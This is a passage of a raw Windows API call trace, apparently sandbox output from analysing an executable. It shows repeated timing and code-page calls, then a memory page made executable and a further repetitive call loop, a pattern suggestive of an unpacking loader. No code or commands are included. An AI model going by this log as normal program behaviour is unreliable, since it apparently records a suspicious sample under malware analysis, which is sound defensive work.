lpCPInfo=0x18fa80) returned 1 [0118.489] GetACP () returned 0x4e4 [0118.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.489] GetACP () returned 0x4e4 [0118.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.489] GetACP () returned 0x4e4 [0118.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.489] GetACP () returned 0x4e4 [0118.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.489] GetACP () returned 0x4e4 [0118.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.490] GetACP () returned 0x4e4 [0118.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.490] GetACP () returned 0x4e4 [0118.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.490] GetACP () returned 0x4e4 [0118.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.490] GetACP () returned 0x4e4 [0118.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.490] GetACP () returned 0x4e4 [0118.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.490] GetACP () returned 0x4e4 [0118.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.491] GetACP () returned 0x4e4 [0118.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.491] GetACP () returned 0x4e4 [0118.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.491] GetACP () returned 0x4e4 [0118.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.491] GetACP () returned 0x4e4 [0118.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.491] GetACP () returned 0x4e4 [0118.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.491] GetACP () returned 0x4e4 [0118.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.492] GetACP () returned 0x4e4 [0118.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.492] GetACP () returned 0x4e4 [0118.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.492] GetACP () returned 0x4e4 [0118.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.492] GetACP () returned 0x4e4 [0118.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.492] GetACP () returned 0x4e4 [0118.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.492] GetACP () returned 0x4e4 [0118.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.492] GetACP () returned 0x4e4 [0118.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.493] GetACP () returned 0x4e4 [0118.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.493] GetACP () returned 0x4e4 [0118.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.493] GetACP () returned 0x4e4 [0118.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.493] GetACP () returned 0x4e4 [0118.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.493] GetACP () returned 0x4e4 [0118.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.493] GetACP () returned 0x4e4 [0118.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.494] GetACP () returned 0x4e4 [0118.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.494] GetACP () returned 0x4e4 [0118.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.494] GetACP () returned 0x4e4 [0118.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.494] GetACP () returned 0x4e4 [0118.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.494] GetACP () returned 0x4e4 [0118.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.494] GetACP () returned 0x4e4 [0118.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.495] GetACP () returned 0x4e4 [0118.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.495] GetACP () returned 0x4e4 [0118.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.495] GetACP () returned 0x4e4 [0118.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.495] GetACP () returned 0x4e4 [0118.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.495] GetACP () returned 0x4e4 [0118.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.495] GetACP () returned 0x4e4 [0118.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.496] GetACP () returned 0x4e4 [0118.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.496] GetACP () returned 0x4e4 [0118.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.496] GetACP () returned 0x4e4 [0118.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.496] GetACP () returned 0x4e4 [0118.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.496] GetACP () returned 0x4e4 [0118.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.496] GetACP () returned 0x4e4 [0118.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.496] GetACP () returned 0x4e4 [0118.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.497] GetACP () returned 0x4e4 [0118.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.497] GetACP () returned 0x4e4 [0118.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.497] GetACP () returned 0x4e4 [0118.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.497] GetACP () returned 0x4e4 [0118.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.497] GetACP () returned 0x4e4 [0118.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.497] GetACP () returned 0x4e4 [0118.498] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.498] GetACP () returned 0x4e4 [0118.498] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.498] GetACP () returned 0x4e4 [0118.498] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.498] GetACP () returned 0x4e4 [0118.498] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.498] GetACP () returned 0x4e4 [0118.498] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.660] GetACP () returned 0x4e4 [0118.660] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.696] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.696] GetACP () returned 0x4e4 [0118.696] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.696] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.696] GetACP () returned 0x4e4 [0118.696] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.696] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.696] GetACP () returned 0x4e4 [0118.696] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.697] GetACP () returned 0x4e4 [0118.697] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.697] GetACP () returned 0x4e4 [0118.697] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.697] GetACP () returned 0x4e4 [0118.697] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.697] GetACP () returned 0x4e4 [0118.697] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.697] GetACP () returned 0x4e4 [0118.697] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.697] GetACP () returned 0x4e4 [0119.012] GetACP () returned 0x4e4 [0119.015] VirtualProtect (in: lpAddress=0x5f5ab8, dwSize=0xf540, flNewProtect=0x40, lpflOldProtect=0x43b444 | out: lpflOldProtect=0x43b444*=0x4) returned 1 [0119.015] AddAtomA (lpString=0x0) returned 0x0 [0119.016] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.016] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.016] AddAtomA (lpString=0x0) returned 0x0 [0119.016] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.016] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.016] AddAtomA (lpString=0x0) returned 0x0 [0119.016] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.016] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.016] AddAtomA (lpString=0x0) returned 0x0 [0119.016] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.016] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.016] AddAtomA (lpString=0x0) returned 0x0 [0119.016] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.016] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.016] AddAtomA (lpString=0x0) returned 0x0 [0119.016] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.016] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.017] AddAtomA (lpString=0x0) returned 0x0 [0119.017] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.017] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.017] AddAtomA (lpString=0x0) returned 0x0 [0119.017] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.017] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.017] AddAtomA (lpString=0x0) returned 0x0 [0119.017] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.017] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.017] AddAtomA (lpString=0x0) returned 0x0 [0119.017] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.017] GetCurrentDirectoryA (in: nBufferLength=0x0, 